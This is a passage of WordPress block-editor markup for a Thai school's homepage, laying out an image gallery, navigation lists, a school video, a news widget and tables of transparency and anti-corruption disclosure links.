8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} 